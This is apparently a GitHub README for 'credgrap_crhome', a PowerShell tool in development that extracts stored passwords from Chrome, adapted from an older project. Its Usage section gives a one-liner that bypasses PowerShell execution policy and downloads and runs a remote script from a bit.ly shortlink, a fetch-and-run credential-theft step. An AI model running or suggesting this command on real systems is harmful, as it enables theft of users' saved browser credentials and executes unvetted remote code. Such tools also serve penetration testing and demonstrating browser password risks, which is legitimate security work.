Skip to content

Latest commit

 

History

History
21 lines (12 loc) · 649 Bytes

README.md

File metadata and controls

21 lines (12 loc) · 649 Bytes

credgrap_crhome

Still in Dev Mode!

Content: Extract stored credentials from Chrome

Author: Florian Hansemann | @HanseSecure | https://hansesecure.de

Source: Chrome extraction imported from https://github.com/sekirkity/BrowserGather (project seems dead)

Modification: Chrome Credential extraction fixed and cookie extraction deleted (buggy)

Date: 04/2018

ToDos: Fixing Username and URL-Regex

Usage

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/2FcJJ3k’)"

Recommendation

Don't save any passwords within your browser and use password safes ;-)